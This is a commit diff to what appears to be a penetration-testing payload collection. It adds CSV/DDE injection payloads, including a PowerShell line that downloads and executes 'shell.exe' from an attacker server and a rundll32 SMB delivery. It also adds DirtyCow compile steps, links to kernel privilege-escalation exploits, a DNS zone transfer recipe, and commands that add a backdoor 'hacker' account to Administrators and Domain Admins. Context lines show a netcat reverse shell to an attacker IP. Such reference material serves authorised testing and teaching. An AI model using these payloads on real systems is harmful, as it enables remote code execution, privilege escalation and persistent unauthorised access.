PrivEsc - Common Exploits

CSV Injection/README.md

@@ -7,10 +7,18 @@ Many web applications allow the user to download content such as templates for i
 Basic exploit with Dynamic Data Exchange
 
 ```powershell
+# pop a calc
 DDE ("cmd";"/C calc";"!A0")A0
 @SUM(1+1)*cmd|' /C calc'!A0
+
+# pop a notepad
 =cmd|' /C notepad'!'A1'
+
+# powershell download and execute
 =cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0
+
+# msf smb delivery with rundll32
+=cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1
 ```
 
 Technical Details of the above payload:

Methodology and Resources/Linux - Privilege Escalation.md

@@ -43,6 +43,11 @@
 * [Groups](#groups)
     * [Docker](#docker)
     * [LXC/LXD](#lxclxd)
+* [Common Exploits](#common-exploits)
+    * [CVE-2016-5195 (DirtyCow)](#CVE-2016-5195-dirtycow)
+    * [CVE-2010-3904 (RDS)](#[CVE-2010-3904-rds)
+    * [CVE-2010-4258 (Full Nelson)](#CVE-2010-4258-full-nelson)
+    * [CVE-2012-0056 (Mempodipper)](#CVE-2012-0056-mempodipper)
 
 ## Checklists
 
@@ -537,6 +542,45 @@ lxc exec mycontainer /bin/sh
 
 Alternatively https://github.com/initstring/lxd_root
 
+
+## Common Exploits
+
+### CVE-2016-5195 (DirtyCow)
+
+Linux Privilege Escalation - Linux Kernel <= 3.19.0-73.8
+
+```powershell
+# make dirtycow stable
+echo 0 > /proc/sys/vm/dirty_writeback_centisecs
+g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
+https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs
+```
+
+### CVE-2010-3904 (RDS)
+
+Linux RDS Exploit - Linux Kernel <= 2.6.36-rc8
+
+```powershell
+https://www.exploit-db.com/exploits/15285/
+```
+
+### CVE-2010-4258 (Full Nelson)
+
+Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04)
+
+```powershell
+https://www.exploit-db.com/exploits/15704/
+```
+
+### CVE-2012-0056 (Mempodipper)
+
+Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64)
+
+```powershell
+https://www.exploit-db.com/exploits/18411
+```
+
+
 ## References
 
 - [SUID vs Capabilities - Dec 7, 2017 - Nick Void aka mn3m](https://mn3m.info/posts/suid-vs-capabilities/)

Methodology and Resources/Methodology and enumeration.md

@@ -176,6 +176,18 @@ masscan -e tun0 -p1-65535,U:1-65535 10.10.10.97 --rate 1000
   index: 0x8 Account: root Name: root Desc: (null)
   ```  
 
+* Zone Transfer
+
+  ```powershell
+  host -t ns domain.local
+  domain.local name server master.domain.local.
+
+  host master.domain.local        
+  master.domain.local has address 192.168.1.1
+ 
+  dig axfr domain.local @192.168.1.1
+  ```
+
 ## List all the subdirectories and files
 
 * Using BFAC (Backup File Artifacts Checker): An automated tool that checks for backup artifacts that may disclose the web-application's source code.

Methodology and Resources/Windows - Privilege Escalation.md

@@ -603,7 +603,6 @@ $ computer = "<hostname>"
 [System.Diagnostics.Process]::Start("C:\users\public\nc.exe","<attacker_ip> 4444 -e cmd.exe", $mycreds.Username, $mycreds.Password, $computer)
 ```
 
-
 ## EoP - Common Vulnerabilities and Exposure
 
 ### Token Impersonation (RottenPotato)

Methodology and Resources/Windows - Using credentials.md

@@ -5,7 +5,8 @@
 ```powershell
 net user hacker hacker1234* /add
 net localgroup administrators hacker /add
-net localgroup "Remote Desktop Users" hacker /add
+net localgroup "Remote Desktop Users" hacker /add # RDP access
+net localgroup "Backup Operators" hacker /add # Full access to files
 net group "Domain Admins" hacker /add /domain
 ```